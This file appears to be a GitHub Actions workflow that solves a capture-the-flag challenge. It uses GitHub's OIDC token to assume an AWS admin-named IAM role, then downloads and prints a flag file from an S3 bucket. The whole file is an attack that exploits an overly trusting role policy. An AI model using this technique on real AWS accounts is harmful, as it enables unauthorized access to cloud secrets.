name: Grab secret flag

on:
  workflow_dispatch:
  push:
    branches: [ main ]

permissions:
  id-token: write
  contents: read

jobs:
  getflag:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Configure AWS via OIDC (assume target role)
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875"
          role-session-name: "ctf-grab-flag-${{ github.run_id }}"
          aws-region: "ap-southeast-1"

      - name: Show identity (sanity)
        run: aws sts get-caller-identity

      - name: Download secret flag
        run: |
          aws s3 cp s3://oh-i-really-do-care/flag.txt ./flag.txt --region ap-southeast-1
          echo "----- FLAG (raw) -----"
          cat flag.txt
